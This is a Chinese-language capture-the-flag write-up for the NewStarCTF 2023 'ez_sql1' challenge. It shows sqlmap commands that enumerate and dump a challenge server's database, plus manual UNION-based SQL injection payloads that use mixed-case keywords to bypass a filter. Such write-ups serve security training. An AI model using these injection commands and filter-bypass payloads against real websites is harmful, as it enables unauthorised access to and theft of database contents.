[NewStarCTF 2023 公开赛道]ez_sql1 【sqlmap使用/大小写绕过】

news2025/10/27 11:49:50

题目：

发现id处可以sql注入：

虽然输入id=1';show databases;#没什么回显，但是知道这里是字符型注入了

这次利用sqlmap注入

--dbs：列出所有数据库名字
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --dbs

--current-db：当前数据库
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --current-db

显示表名
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' --tables

--dump：显示文段内容
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' -T 'here_is_flag' --dump

其他手动SQL注入方法

利用大小写绕过

/?id=1' Order by 5 --+

/?id=1' Union SELect 1,version(),user(),database(),5  --+

?id=' uNion Select 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA= 'ctf'--+

?id=0' uNion Select 1,2,3,4,flag FROM ctf.here_is_flag--+

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2313386.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！